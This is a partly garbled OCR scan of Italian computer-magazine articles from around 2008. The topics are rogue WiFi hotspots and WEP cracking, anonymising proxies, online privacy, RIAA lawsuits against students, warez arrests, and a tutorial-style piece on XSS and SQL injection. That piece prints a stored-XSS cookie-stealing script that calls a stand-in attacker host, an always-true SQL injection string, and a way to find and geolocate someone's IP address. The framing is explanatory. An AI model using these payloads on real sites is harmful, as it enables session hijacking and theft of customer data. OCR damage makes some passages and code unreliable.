puter in una sorta di ripetitore. Crea 
cioè quella che si definisce una rete 
"ad hoc". Il metodo classico, detto 
"infrastruttura", è un collegamento 
"client > borne", mentre qui si tratta 
di un collegamento "client > client" 
(da PC a PC). 

Il computer del pirata apparirà quin- 
di come un punto di accesso WiFi 
tra i tanti. Utilizzando una denomi- 
nazione come "WiFi gratis", "Hot- 
spot gratuito" o "Accesso libero", il 
pirata attirerà numerosi navigatori 
alla ricerca di un hotspot gratuito. 
Tuttavia, tutti gli scambi effettuati 
sul Web da questi navigatori transi- 
teranno sul computer del pirata che, 
provvisto di un programma adegua- 
to, potrà recuperare le informazio- 
ni che gli interessano. 
Per difendersi da questa tecnica do- 
vremo disattivare la possibilità di 
connetterci alle reti ad hoc modifi- 
cando le impostazioni della nostra 
connessione WiFi. 



:iom vengono comunque 
i tra i due computer. 
Aircrack isola quindi frammento per 
frammento gli elementi criptati che 
corrispondono alla chiave WEP. 
Una volta che il pirata è in posses- 
so di questa chiave, può connetter- 
si segretamente alla nostra rete e 
approfittare della nostra connessio- 
ne Internet. 



:: L'internazionale 
degli hacker 

Diverse comunità di hacker si de 
dicano addirittura a sessioni di ri 
cerca, il cosiddetto "Wardriving" 



tette o tutelate in modo inadeguato 
vengono localizzate e mappate. 
Se questa attività è molto utile per in- 
dividuare "hotspot" gratuiti e di fatto 
legali, facilita anche il compito ai pi- 
rati dilettanti. In rete sono molto dif- 
fusi elenchi che mettono a disposi- 
zione le chiavi WEP decifrate da al- 
tri pirati! Alcuni non esitano nemme- 
no lasciare delle marcature (una pra- 
tica conosciuta come "Warchalking") 
per fornire le informazioni necessarie 
per l'intercettazione di segnali WiFi 
non protetti. 

Tutti i segnali sono reperibili s 
http://craiefiti.free.fr. 
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Chiunque può ottenere il nostro indirizzo IP: isti Me visitiamo, 
spie malintenzionate, agenzie ni marketing e naturalmente II | 
nostro provider. Anche se non abbiamo niente da nascondere, 
perché non difenderci con un proxy? M 



j 



AP (Java Anon Proxy) è un 
programma che consente 
di gestire una lista di proxy. 

Questi ultimi sono computer che 
fanno da "tampone" tra il nostro PC e il 
server Web al quale vogliamo connet- 
terci (quando desideriamo consultare 
un sito o scaricare un brano). Il siste- 
ma permette di non utilizzare diretta- 
mente il nostro indirizzo IP (il numero di 
identificazione unico del nostro compu- 
ter, che comunichiamo inevitabilmente 
quando scambiamo dati sulla Rete). A 
un'organizzazione o a un individuo che 
volesse conoscere le nostre abitudini 
di navigazione (o la nostra identità fisi- 
ca in caso di procedure giudiziarie) ba- 
sterebbe usare questo indirizzo IP e le 
informazioni del nostro server per rin- 
tracciarci. Con l'utilizzo di JAP, invece, 
la persona o l'organizzazione in que- 
stione vedrebbe soltanto l'IP del pro- 
xy (costituito da un numero diverso). 
Naturalmente, il proxy anonimo cono- 
sce l'indirizzo del computer del cliente 
ed è in grado di registrarlo. L'anonima- 
to è quindi decisamente relativo in ca- 
so di procedimenti giudiziari e di inda- 
gini approfondite (terrorismo, traffici il- 
leciti...). Il programma, tuttavia, mette 



JAP V00.I0.003 

Dimensioni: 5,4 MB 

Licenza: Gratuita per la versione "base" 

Lingua: Inglese 

Collegamento: 

http://anon.inf.tu-dresden.de 



i singoli privati al sicuro dai pirati e dal 
"Grande Fratello". 



:: JAP, come al cinema... 

JAP comprende un elenco di que- 
sti proxy e non esita a usarli "a ca- 
scata" (cioè uno dopo l'altro) per 
confondere ancor più le acque; un 

po' come avviene nei film di spionag- 
gio. All'atto dell'installazione, il pro- 
gramma di connessione JonDo ci aiu- 
terà a configurare il nostro anonima- 
to: protezione anti-provider, anti-siti 
sensibili, proxy per tutti i programmi 
e protocolli attuali, eccetera. 
Basta seguire la guida. In caso di 
dubbi, lasciamo invariati i parame- 
tri predefiniti o consigliati. Dovremo 
quindi scegliere i messaggi di avver- 
timento che desideriamo visualizza- 
re. Se non sappiamo quali sceglie- 
re, selezioniamo quelli che appaiono 
in verde. Se poi vorremo modifica- 
re questi parametri, sarà sufficiente 
cliccare su Assistant alla base della 
finestra principale. Terminata l'ope- 
razione, JAP ci connetterà a un ser- 
vizio gratuito di anonimato e calcole- 
rà il nostro livello di trasparenza sul- 
la Rete. Se l'indicatore è su OK, non 
ci siamo; se invece è su Fair, signifi- 
ca che siamo meno visibili. Infine, il 
livello High impedisce praticamente 
a chiunque di risalire al nostro PC! È 
possibile ottenere un'indicazione del 
livello di sicurezza (espresso in deci- 
mi) per ogni servizio indicato nel me- 
nu Configuration. 



Individuiamo nel menu a tendina il 
servizio gratuito più sicuro. Se non 
siamo soddisfatti o se a livello High 
la velocità è esageratamente bas- 
sa, JAP ci offre servizi a pagamen- 
to molto accessibili. Alcuni sono di- 
sponibili a meno di un euro al mese. 
Perché il programma funzioni corret- 
tamente, non dimentichiamo di disat- 
tivare Java, JavaScript e plug-in nel 
nostro browser. Chiaramente, JAP è 
uno strumento specializzato che non 
è il caso di proporre alla nonna. Me- 
rita comunque un'occhiata ed è con- 
sigliabile alle persone che non ap- 
prezzano che gli altri mettano il na- 
so nei loro affari. Un'ultima annota- 
zione: alcuni siti non amano molto al- 
cune azioni effettuate da JAP (elimi- 
nazione dei cookies ecc.) e a volte 
sarà necessario rinunciare all'anoni- 
mato per poter visualizzare una pa- 
gina specifica... ■ 



Ia sapere 



Il passaggio attraverso uno o più 
proxy richiede più tempo rispetto 
alla connessione "normale". Que- 
sto si traduce in una diminuzione del- 
la velocità durante la navigazione. 
Sta a noi decidere se il gioco vale la 
candela... 
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Di noi sanno tutto! 



Ì Smto luiì i nome sui SooiilBiperr 
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liiinin 



a 



a 30° conferenza mondiale 
sulla protezione dei dati e del- 
la privacy si terrà a Strasbur- 
go dal 15 al 17 ottobre 2008. 



tlItilISlSllMtfeiiKHiTslfsWwt] 



privati comunicati dai navigatori alle re- 
te sociali, per poi sommergerli di pub- 
blicità mirate. Proprio così, i pubblicita- 
ri vanno matti per i nostri dati persona- 
li. E non sono i soli... 



:: Un'attività quotidiana 

La navigazione su Internet è diven- 
tata un'attività quotidiana qualsia- 
si. 



lino dall'altra parte del mondo, navi- 
ghiamo da un amico all'altro attraver- 



la nostra rete sociale prefe- 
... Forse non lo sappiamo 
ognuna di queste attività la- 
ia delle tracce. Molti credono 
ancora al mito dell'anonimato 
che nrotennerebbe Inter- 



net. Invece, "non ap- 
pena ci si connette, 
si lasciano tracce" - 
spiega Dominique 
Maniez, speciali- 
sta di tecnologie 
dell'informazio- 
ne e autore del li- 
bro "Le dieci pia- 
e di Internet". 
_ i possono di- 
stinguere le tracce 
passive (che l'uten- 
te lascia quando con- 
sulta Internet) e quelle at- 




s regole p base f a Sapere 

ui forum, utilizziamo sempre uno pseudonimo. 
_ Non utilizziamo la nostra data di nascita come password. 
Non rispondiamo mai a una mail di spam. 
Eliminiamo regolarmente i cookie dal nostro browser. 

Per inviare un messaggio di natura personale, utilizziamo preferibilmente una sem- 
plice e-mail piuttosto che un annuncio su una rete sociale. 



'utente lascia 
indo comunica il suo 
indirizzo elettronico o si re- 
gistra su Facebook). Queste ul- 
time sono le più pericolose". In effet- 
ti, l'ultima moda sono le reti sociali e i 
contenuti generati dagli utenti. MySpa- 
Facebook, Flickr e altri siti analiz- 
o di continuo i nostri gusti, le no- 
attività e i nostri desideri, li colle- 
o a quelli dei nostri amici e quindi a 
Ili degli amici dei nostri amici... e li 
servano, per periodi di tempo diffi- 
da definire. 
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:: La "cyber-sorveglianza": 
una realtà... 

Quando sottoscriviamo un abbo- 
namento a Internet, il nostro provi- 
der ci assegna dei dati di connes- 
sione (indirizzo IP, password...) le- 
gati alla nostra identità (carta di 
credito, numero telefonico...). 



jalsia- 
5, un< 
legge obbliga tutte le imprese e i pr 
vati che mettono a disposizione < 
altri una connessione Internet (ho 
spot, cybercafé...) a conservare pe 
un anno i dati personali degli utenl 
Quando andiamo a comprare il pé 
ne, il fornaio non è tenuto a chiede 
ci il nostro nome. Su Internet, inve 
ce, dovrebbe farlo! Leggendo quest 
articolo c'è chi penserà: "E allora? I< 
non ho niente da nascondere". Il pro- 
blema, però, non sono i dati in sé, 
bensì l'uso che ne viene fatto. 

"Alcune informazioni come l'indirizzo 
postale, il numero di cellulare o la da- 
ta di nascita non dovrebbero mai ap- 
parire on-line" - osserva Dominique 
Maniez. Molti individui, infatti, po- 
trebbero utilizzare i nostri dati perso- 
nali per fini tutt'altro che innocui. 



tìoSÀ ptìE fi 
NOI IL NOSTRO IP 



'indirizzo IP è un numero che 
.identifica il nostro computer sul- 
la Rete. Visitando il sito http://wha- 
tismyipaddress.com possiamo visua- 
lizzare, oltre al nostro indirizzo, una 
mappa di Google che rivela la nostra 
posizione geografica. Il risultato non 
è sempre preciso ma è comunque 
indicativo... Grazie al nostro IP, un 
webmaster può sapere quante volte 
visitiamo il suo sito o blog, quali pa- 
gine consultiamo, quali rubriche ci in- 
teressano di più... e se ha cattive in- 
tenzioni, può rivendere questi dati al 
miglior offerente. 



IAME GENERATOR 



rrnc ITOLO 



...dalle conseguenze 
inquietanti 

Per cominciare, i datori di lavoro, 
che oggigiorno non esitano a per- 
lustrare Internet per informarsi su 
un potenziale dipendente. 



non corri- 
sponde necessariamente a ciò che sia- 
mo realmente oggi. Il fatto che Tizio un 
giorno abbia lasciato un messaggio su 
un forum dedicato al poker on-line si- 
gnifica forse che è dipendente dal gio- 
co d'azzardo? Certo che no. Il suo futu- 
ro datore di lavoro, però, potrebbe por- 
si questa domanda. Più sconcertante è 
il fatto che gli agenti di marketing ana- 
lizzino i nostri profili di consumatori. Ac- 
quistando on-line un rossetto bio senza 
preoccuparci di deselezionare le picco- 
le caselle in fondo al modulo, ci ritrove- 
remo a ricevere ogni giorno decine di e- 
mail di spam che vantano i meriti di una 
tinta per capelli o di una pillola blu dagli 
effetti "garantiti"! 

Le reti sociali, che offrono gratuitamente 
i propri servizi, vivono delle informazioni 
che noi forniamo loro. Il programma pub- 
blicitario "Beacon" di Facebook è stato 
recentemente modificato dopo aver rice- 
vuto numerose critiche. Ogni volta che 
si effettuava un acquisto on-line, Bea- 
con lo inseriva automaticamente nel pro- 
filo dell'utente, allo scopo di "consigliare' 
lo stesso acquisto a tutti i suoi contatti. 
Oggi è possibile disattivare la funzione 
ma questo non impedisce agli agenti d 
marketing di analizzare tutte le tracce da 
noi lasciate in perfetta buona fede. Infi- 
ne, l'aspetto più grave: i cyber-criminal 
possono utilizzare questi dati per usur- 
pare la nostra identità. Questa pratica 
si definisce "spoofing". "Con le informa- 



BUONO A 

Sapersi 



sistono moltissimi espedienti per 
essere meno "trasparenti" su In- 
ternet. Il programma Tor (disponibi- 
le all'indirizzo www.torproject.org) ci 
mette a disposizione una serie di stru- 
menti che nascondono gli scambi di 
dati assegnandoci un diverso indiriz- 
zo IP a ogni connessione. Il program- 
ma Privoxy (www.privoxy.org) è un 
ottimo accessorio. Si tratta di un pro- 
xy web in grado di bloccare i cookie 
e le informazioni collegate al nostro 
)rowser. Infine, il sito www.fakena- 
megenerator.com ci assegna una fal- 
sa identità in un paio di clic. Ideale per 
i navigatori a corto di fantasia! 



zioni così carpite è facile per un crim 
le farsi passare per qualcun altro" - s 
ga Dominique Maniez. Ricordiamo 
nell'agosto 2007 sono state sottratte 
gliaia di curriculum inviati al sito di ri» 
ca di lavoro Monster.com, che conti 
vano quasi 1,6 milioni di informazioni 
sonali suscettibili di essere utilizzate ; 
criminali. Questo incidente non è eh- 
esempio..." "I navigatori hanno una f 
eia eccessiva nella tecnologia. Studi 
centi evidenziano i rischi delle reti so 
li di moda come Facebook o Linkedlr 
cui alcune persone presentano sul | 
prio profilo informazioni che non confi 
rebbero mai al proprio vicino di cas 
nota Dominique Maniez. 



:: Prudenza... 

D'altra parte, ricercando eccessiva- 
mente l'anonimato, non si rischia di 
apparire sospetti? "Nel contesto della 
comunicazione,èfondamentalesapere 
che la persona con cui si parla è real- 
mente chi dice di essere. L'adozione di 
sistemi di autenticazione come la firma 
elettronica risolverebbe molti problemi" 
- risponde Dominique Maniez. È chia- 
ro che su Internet l'anonimato è tutt'al- 
tro che la norma. Conviene quindi es- 
sere vigili e seguire alcune precauzioni 
di base (vedi riquadro)» 
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nelle università americane 



le major americane nanne la caccia, 
agli sMeoti che cenùminm musicabili Me 
ma I lare attacchi ili massa incentrane 
l'nnnesiziene Mie associazioni ili 'difésa 



MifliiiliMII 



e a Me delle 
stesse università 



L 



riale protetto da copyright, e 
in particolare di file audio, sul- 
le reti peer-to-peer, è sempre 
più al centro di cause e polemiche ne- 
gli Stati Uniti, in particolare in ambi- 
to universitario. Gli studenti infatti so- 
no nel mirino della RIAA, ossia la Re- 
cording Industry Association of Ame- 
rica, un'associazione che rappresen- 
ta le principali label dell'industria disco- 
grafica statunitense e che è diventata il 
principale portavoce della crociata con- 
tro il P2R La sua sorveglianza sui cam- 
pus viene svolta attraverso MediaSen- 
try, una società specializzata nella ri- 
cerca e individuazione delle violazioni 
del copyright i cui metodi vengono spes- 
so messi in discussione e paragonati a 
quelli degli hacker. Per trovare i presunti 
violatori dei diritti nei campus MediaSen- 
try lancia delle ricerche in serie di brani 
di proprietà dei membri della RIAA con 
applicazioni per il P2P come LimeWire 
e simili. Quando ne trova uno, salva l'in- 
dirizzo IP a cui corrisponde e verifica se 
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appartiene a un'università. Nel caso, lo 
segnala alla RIAA. 

:: Due tipi di intervento 

Se si trovano dei file sui siti univer- 
sitari, la RIAA può procedere in due 
modi, di diversa aggressività nei con- 
fronti del "sospettato". Se MediaSen- 
try ha solo stabilito che un certo indirizzo 
ha delle cartelle in condivisione che con- 
tengono materiale coperto da copyright, 
la RIAA invia una lettera di richiesta di 
cessazione di attività. Questa ingiunzio- 
ne, che viene inviata ai responsabili del- 
l'istituto in modo che possano adottare in- 
terventi disciplinari, è detta "DMCA take- 
down notice" e richiede che i file venga- 
no tolti senza però minacciare una causa. 
Questo tipo di intervento è il meno grave 
e si limita a identificare la presenza dei 
file sul computer dell'utente: MediaSen- 
try non ha l'intenzione di dimostrare che 
c'è una distribuzione illecita di materia- 
le coperto da copyright (infatti non sca- 
rica i file). La situazione diventa più gra- 
ve se a essere spedita , .,_,..,,, „ ,-_ 
è una "Early Settlement 
Letters" che è un'espli- 
cita minaccia di causa ri- 
volta ai singoli studen- 
ti. Una volta che lo sfor- 
tunato universitario rice- 
ve una di queste missi- 
ve, l'unica cosa che può 
fare per evitare di finire in 
tribunale è pagare i dirit- 
ti alla RIAA. L'associazio- 
ne ha persino predispo- 
sto un sito per consen- 
tire il pagamento imme- 
diato on-line attraverso 
carta di credito: mazza- 
te sì, ma ben organizzate. , 



sogno di dimostrare che effettivamen- 
te da quell'IP sono mai stati trasferiti. J 
Il fatto che sia possibile farlo è suf- Z 
fidente a procedere. Questo pre- / 
supposto, alla base della mag- / 
gior parte delle cause intentate / 
dalla RIAA, non ha però un fon- I 
damento legale molto solido. La ■ 
EFF (Electronic Frontier Founda- 1 
tion), un'organizzazione america- * 
na che si occupa di tutelare i diritti 
dei privati e si è spesso trovata in po- 
sizioni opposte a quelle della RIAA, so- 
stiene che rendere un file disponibile su 
una rete P2P non può essere considera- 
to un atto di distribuzione a meno che il fi- 
le non sia stato effettivamente scaricato. 

:: Un piccolo passo 
per una coppia... 

Un caso emblematico è stato quel- 
lo della causa intentata nel 2006 da 
Atlantic contro gli Howell, marito 
e moglie accusati di violazione del 
copyright per aver caricato dei brani 







Ini- Ih- Uni Propri? 



:: Presunti colpevoli 

I metodi usati da MediaSentry non 
mancano di sollevare perplessità, an- 
che in seno ai responsabili delle uni- 
versità americane. Le minacce di cau- 
sa vengono infatti inviate sulla base del 
fatto che MediaSentry ha identificato del 
file protetti da copyright all'indirizzo IP di 
un certo computer che si trova in un Col- 
lege, è riuscita a scaricarli e sa che so- 
no stati trasmessi sulla Rete. Non ha bi- 



su un computer collegato a KaZaA. 

Un caso emblematico è stato quello del- 
la causa intentata nel 2006 da Atlantic 
contro gli Howell, marito e moglie accu- 
sati di violazione del copyright per aver 
caricato dei brani su un computer colle- 
gato a KaZaA. La coppia si è difesa so- 
stenendo che i file erano stati carica- 
ti per uso personale, per facilitare il tra- 
sferimento sui dispositivi portatili (opera- 
zione più che legale). La presenza di un 
programma per la condivisione era dovu- 
ta al fatto che i due rendevano disponibi- 



li sulla rete P2P del materiale pornografi- 
co e libri elettronici non coperti da copyri- 
ght. Inizialmente il giudice aveva accolto 
la richiesta di giudizio sommario formu- 
lata dalla RIAA e aveva condannato la 
coppia a pagare $40,850 e le spese pro- 
cessuali. Gli Howell, forti dell'appoggio e 
del sostegno della EFF, sono però ricor- 
si in appello sostenendo di non conosce- 
re a fondo il funzionamento di KaZaA. In 
particolare dichiarano di non essere sta- 
ti a conoscenza del fatto che i file perso- 
nali salvati sul computer sarebbero stati 
condivisi in Rete. Il 29 aprile 2008 la cor- 



te distrettuale ha rifiutato la mozione di 
giudizio sommario e sarà quindi neces- 
sario procedere con l'azione legale per 
determinare se effettivamente la possi- 
bilità di condividere i file rappresenti una 
violazione del copyright. La vera guer- 
ra, quindi, non ha ancora un vincitore.. .■ 



BUANio 

LE UNIVERSITÀ 1 
lltìoNo NO 



I metodi della RIAA non mancano di 
destare perplessità nelle autorità 
accademiche americane. Alcuni ate- 
nei, tra cui l'Università di Washington e 
l'Università dell'Oregon, si sono rifiuta- 
ti di recapitare le lettere di minaccia di 
causa ai loro studenti perché ritengo- 
no che non sia legalmente sostenibile 
identificare uno studente tramite un in- 
dirizzo IP. Anche i computer nelle stan- 
ze degli studenti nelle aree adibite ad al- 
loggio, infatti, possono essere usati da 
diverse persone e la responsabilità le- 
gale per una data azione è, secondo lo- 
ro, tutta da stabilire. 
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come si cracca un silo 



Nessuno è perfetta: 
neanche il nostre 
eotìioe. Basta 
un stette ili 
programmazione 
in una pagina mieli 
e una gestione 
superbiate ilei 



mmtì&mlimi 



per aprire la porta 
a insidiose fugge Ai 
iati e possibilità di 
haekeragglo... 



essun sito è davvero si- 
curo e nessuno è real- 
mente anonimo su Inter- 
net: lo abbiamo sentito 
dire così tante volte che i con- 
fini tra fatti e paranoia non so- 
no più tanto chiari. Nella real- 
tà, però, anche se i sistemi di prote- 
zione si evolvono a un ritmo serratis- 
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Simo, hacker e cracker hanno sem- 
pre più strumenti per violare i nostri 
siti, i nostri computer, i nostri data- 
base, il nostro anonimato e... chi più 
ne ha più ne metta. In questo artico- 
lo vedremo due delle principali tec- 
niche di cracking basate su exploit. 
Con exploit si intende un codice che 
sfrutta un bug o una vulnerabilità di 
un programma per consentire a chi 
lo usa di acquisire privilegi (possibil- 
mente di root, anche se si può inizia- 
re con privilegi minori) su un sistema. 
Gli exploit che interessano a noi so- 
no quelli remoti, cioè attacchi sferrati 
via Internet senza un accesso diretto 
al sistema della vittima. 



:: XSS: codice nascosto 

XSS è l'acronimo di Cross-si- 
te scripting (XSS) e indica una 
tecnica di attacco che permet- 
te di inserire del codice (in ge- 
nere Javascript) a livello brow- 
ser per modificare il sorgen- 
te della pagina Web visitata. I 
cracker possono sfruttarla per ottene- 
re dati sensibili come i cookie. Le pa- 
gine più vulnerabili sono quelle che 
hanno uno scarso controllo delle va- 
riabili derivate dall'input dell'utente 
(spesso variabili GET). L'XSS è uno 
degli exploit più diffusi della Rete. Al 
2007, circa l'80% di tutte le vulnerabi- 
lità di sicurezza documentate sui siti 
era legato a problemi XSS che spes- 
so hanno portato anche ad attacchi di 
phishing (raccolta di dati sensibili ese- 
guita sfruttando una falsa identifica- 
zione) su larga scala. Gli attacchi XSS 
non sono neanche immediatamente 
identificabili; mentre il codice malevo- 
lo svolge il suo lavoro, il sito appare 
uguale al solito al malcapitato utente. 

:: L'XSS si fa in tre 

Ci sono tre diverse tipologie di 
XSS (tipo 1, tipo 2 e tipo 3) con 
modalità di funzionamento dif- 
ferenti. Il primo tipo è il meno 
popolare, in quanto per poterlo 
mettere in atto l'hacker deve 
conoscere i file HTML presenti 
sul sistema operativo del suo 
bersaglio o trovare delle vul- 



A CACCIA fi IP 



La prima cosa che ha bisogno un hacker per attaccare un computer è il suo 
indirizzo IP. L'indirizzo IP è un po' come il numero civico di un palazzo: sta- 
bilisce in maniera univoca la locazione di un computer o di un server. Un indiriz- 
zo IP si presenta come una sequenza di numeri di un massimo di 3 cifre separa- 
ti da un punto, per esempio 212.140.12.101. I primi due blocchi di cifre indicano 
l'area di rete, il terzo blocco indica la sottorete, o subnet, e l'ultimo blocco indi- 
ca il computer. 

Conoscere il proprio IP è molto semplice, basta per esempio usare un sito Inter- 
net come http://whatsmyip.org/. Questi servizi non sono però sempre precisi, per- 
ché l'indirizzo IP del nostro computer è spesso "mascherato" dal nostro provider: 
in questo modo tanti clienti dello stesso provider si vedono rispondere allo stesso 
modo da servizi come quello citato, perché l'IP che risulta è quello del provider e 
non dei singoli utenti. Come fa quindi un hacker a scoprire gli indirizzi IP? 
Un metodo piuttosto diffuso è usare Windows Messenger. Farlo è semplice: basta 
inviare al (o ricevere dal) computer di cui si vuole scoprire l'IP un file (un mes- 
saggio non basta, serve una connessione diretta, come nel caso del trasferimento 
file). Una volta che il trasferimento è avviato basta aprire una finestra DOS e scri- 
vere "netstat" (senza le virgolette). Il risultato sarà qualcosa di questo tipo: 

Proto Indirizzo locale Indirizzo esterno Stato 
TCP kick:1033 msgr-ns29.msgr.hotmail.com: 1863 ESTABLISHED 
TCP kick:1040 msgr-sb36.msgr.hotmail.com: 1863 ESTABLISHED 
TCP kick: <REMOTE HOST> ESTABLISHED 



Comparando l'elenco delle connessioni prima e dopo l'invio del file non è diffi- 
cile trovare l'indirizzo IP del computer remoto. Non è nemmeno detto che i pira- 
ti si fermino qui. Dall'indirizzo IP del nostro computer non è infatti impossibile ri- 
salire alla nostra locazione fisica. I dati completi sull'intestatario dell'indirizzo IP 
sono noti solo al fornitore di servizi Internet ma ci sono varie tecniche per sco- 
prire in che area e persino in che locazione precisa si trova il computer. Scopri- 
re l'area in cui vive un amico conosciuto in Internet e di cui sappiamo l'indirizzo 
IP è un gioco da ragazzi: basta usare un servizio automatico come quello che tro- 
viamo all'indirizzo 




http://www.geobytes.com/lpLocator.htm 



Può essere semplicemente un trucchetto per far colpo sulla nuova ragazza cono- 
sciuta su Messenger ma può anche diventare uno strumento per completare il pro- 
filo di un utente di cui vogliamo rubare l'identità... 



nerabilità nel browser. Nel primo 
caso, l'hacker dal proprio sito può in- 
viare dei comandi malevoli ai file HT- 
ML vulnerabili del suo target ed ese- 
guirli sul suo sistema. Nel secondo, 
usando una vulnerabilità del browser 
l'hacker può installare uno script ac- 
tiveX sul sistema bersaglio. Lo script 
activeX opererà con i privilegi HTML 
locali, che vengono concessi a tutti i 
Javascript senza chiedere il consen- 
so dell'utente, e sarà libero di instal- 
lare backdoor, worm o altre forme di 



malware. Questo tipo di attacco XSS 
è detto anche locale. 
Il tipo 2, conosciuto anche come non 
persistente, si crea invece iniettando 
un Javascript in una variabile che vie- 
ne rimbalzata all'utente. Per poterlo 
usare l'hacker deve riuscire ad attira- 
re l'utente in una la pagina con que- 
sto tipo di codice dopo avervi inserito 
un sistema per sottrarre dati personali 
come i cookie. È detto non persisten- 
te perché il codice iniettato non rima- 
ne sul sito Internet e i soli utenti vul- 
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UN |$|«PIO (fi 
SGL INjECTION 



Per capire nella pratica con un 
esempio molto semplice come 
funziona una SQL injection immagi- 
niamo il sito di un fornitore di ser- 
vizi acquistabili on-line che ospi- 
ta un database dei clienti con dati 
di fatturazione e pagamento. Met- 
tiamo che una query consista in que- 
sta stringa: 



"select 



A 



from customers :*: 
9 
where company name like A & 

11 + TextBoxl.Text + "%' w 



Se noi cerchiamo "Andrea" eseguire- 
mo la query: 



"select * from customers x 

9 
where company name like £c 

*Andrea%' * 



Se lo sviluppatore del sito non ha pre- 
so le necessarie misure di sicurez- 
za (validando il contenuto della Text- 
Box), un hacker potrebbe ottenere la 
lista completa dei clienti del databa- 
se semplicemente inserendo nella ca- 
sella di testo la stringa: 

11 A or A a' like A a w 

Lo statement SQL sarebbe infatti 



"select * from customers 
where company name like y ' 
or *a' like A a%' « 



9 



Dato che la clausola whe- 
re è sempre vera viene visualiz- 
zato il contenuto completo del- 
la tabella customers, ossia l'elen- 
co dei clienti contenuti nel database. 
Nella migliore delle ipotesi, il re- 
sponsabile del sito è accusabi- 
le di negligenza per non aver pro- 
tetto la privacy dei suoi clienti. 
Nella peggiore, i dati sottratti posso- 
no essere usati per vari tipi di truffe 
informatiche. 




nerabili sono quelli che accedono al- 
la pagina infetta, cliccando su un link 
realizzato a questo scopo dall'hac- 
ker. Il tipo 2 è il più diffuso e rappre- 
senta una minaccia seria per la tutela 
dei dati personali. Il terzo tipo di attac- 
co XSS, detto persistente, viene usa- 
to in forum, guestbook e altre pagine 
che contengono dati personali forniti 
via Intenet e salvati. Portando il mag- 
gior numero possibile di utenti a visi- 
tare una pagina che contiene il suo 
codice di infiltrazione, l'hacker potrà 
rubare i loro dati e poi utilizzarli altro- 
ve. Per esempio, mettiamo che in un 
dato forum, quando un utente inse- 
risce un post, il contenuto venga vi- 
sualizzato direttamente, senza alcun 
filtraggio intermedio. L'hacker può in- 
serire nel form una stringa di codice 
del tipo: 



< script language = \ Javascript w > 



SL 



9 
document. location, href = £: 

\http:// sitohacker/malware.^: 

9 

php?value = w + document. cookie;:* 
</script> 



in cui sitohacker è il sito in cui l'hacker 
ha il suo script malware.php, che ha 
come dato in ingresso il valore conte- 
nuto nella stringa document. cookie, 
ovvero le informazioni di sessione 
dell'utente vittima. All'inserimento del 
post, la pagina HTML del forum con- 
terrà il codice Javascript dell'hacker. 
Ogni volta che un utente andrà a leg- 
gere il post in questione, il suo brow- 




/ 
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ser interpreterà la pagina web ed ese- 
guirà il codice inserito dall'hacker, ca- 
ricando bad-script.php e rendendogli 
disponibili i suoi dati di sessione. Le 
chiavi di accesso scoperte permette- 
ranno poi all'hacker di navigare nel 
forum autenticandosi come questo 
utente, che potrebbe anche essere 
l'amministratore... 

:: SQL iniection: un'iniezione 
che fa male alla privacy 

Gli exploit di tipo SQL Injection 
attaccano le applicazioni web 
che si appoggiano su un data- 
base (tipicamente SQL Server 
o MySQL ma anche Access, 
Oracle o FireBird) e sfruttano 
falle nei controlli sui dati rice- 
vuti in input per inserire del 
codice maligno all'interno di 
una query. In questo modo l'hac- 
ker può non solo autenticarsi con am- 
pi privilegi in aree protette ma anche 
scoprire i dati sensibili degli utenti re- 
gistrati nel database (vedi il box "Un 
esempio di SQL injection") e persino 
alterarli. Un aiuto all'hacker, nel suo 
programma di violazione progressi- 
va del sito attraverso le SQL injec- 
tion, sono i messaggi di errore con 
cui il database risponde ai tentativi di 
invasione. Nel segnalare che la sin- 
tassi della query non è corretta, in- 
fatti, il database fornisce al malinten- 
zionato utili dati aggiuntivi. Se il sito è 



IP StÀTItìO 
E ilNÀttlCO 



Il tipo di IP più bersagliato dai pi- 
rati è quello statico, cioè che ri- 
mane sempre uguale nel tempo. 

Viene adottato da grossi server. Se 
siamo dei semplici utenti che sia ap- 
poggiano a un fornitore di servizi In- 
ternet avremo un IP dinamico (cioè 
che cambia sempre in quanto ci vie- 
ne assegnato dall'ISP al momento di 
ogni connessione). Basterà sconnet- 
tersi e riconnettersi per modificare le 
ultime due cifre dell'indirizzo (le altre 
sono legate all'ISP e non variano). Se 
abbiamo un collegamento con IP di- 
namico ma attivo ventiquattro ore al 
giorno, però, l'IP rimane lo stesso 
pertutto il tempo che siamo collegati, 
fino a quando ci disconnettiamo. 






^ 



protetto, invece di vedere un messag- 
gio di errore il nostro hacker si trove- 
rà ridirezionato a una pagina generi- 
ca designata dallo sviluppatore. Le ri- 
sorse dell'hacker, però, non sono an- 
cora finite: c'è infatti un'altra forma 
di attacco SQL, che richiede un po' 
più di tempo e interazione da parte di 
chi sferra l'attacco ma può consentir- 
gli l'accesso a numerosi dati, che è 
detta Blind SQL injection. Si chiama 
blind, cioè cieca, perché l'hacker de- 
ve procedere alla cieca, per tentativi. 
Può usare una funzione del databa- 
se per formulare una serie di doman- 
de la cui risposta possa essere "sì" o 
"no" e procedere a raffinare le sue ri- 
cerche in base alle risposte del data- 
base. Potrà così carpire e manipolare 
anche i dati meno accessibili. ■ 
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inversi importanti membri ilei gruppi warez Cinefox e 
CaRNage. Panino tra i professionisti Mia contraffarne 
e i semplici olenti in cerea 6i novità ■■■■ 
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a fine di giugno in Francia non 
è stata caratterizzata solo dal 
caldo afoso ma anche da una 
serrata attività contro la diffu- 
sione di materiale coperto da copyri- 
ght. I poliziotti francesi della Brigata 
Centrale per la Repressione delle Con- 
traffazioni Industriali e Artistiche (BCR- 
CIA) e i funzionari della Polizia Giudi- 
ziaria hanno acciuffato uno dopo l'al- 
tro quattro navigatori di Internet molto 
speciali. Per cominciare gli amministra- 
tori del gruppo Cinefox, poi un compo- 
nente importante del gruppo noto con 
lo pseudonimo di CaRNage. Dei pilastri 
della scena warez, specializzati nella 
diffusione di film piratati. Gli agenti so- 
no riusciti a risalire a Cinefox partendo 



da un misterioso documento diffuso su 
Internet nell'agosto 2007. Il file di testo, 
denominato Bustme ("pescami" in in- 
glese), forniva gli IP, gli pseudonimi, gli 
accessi ai server FTP e ai server IRC 
nonché i codici che consentivano di de- 
cifrare i messaggi scambiati. In breve, 
una vera manna per chiunque deside- 
rasse sferrare un attacco a questo ti- 
po di società digitali. L'inchiesta della 
BCRCIA si è concentrata sui respon- 
sabili di un server warez ma anche sul- 
la persona che si occupava di "rubare" 
i film nelle sale cinematografiche. 
"Un ottimo esempio di attività 
criminale organizzata, un'ag- 
gravante in materia di contraf- 
fazione" - conferma una fonte 
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vicina all'inchiesta. L'individuo che si re- 
cava nei cinema per registrare illegal- 
mente i film forniva le sue "produzioni" 
soprattutto a Cinefox ma firmava i suoi 
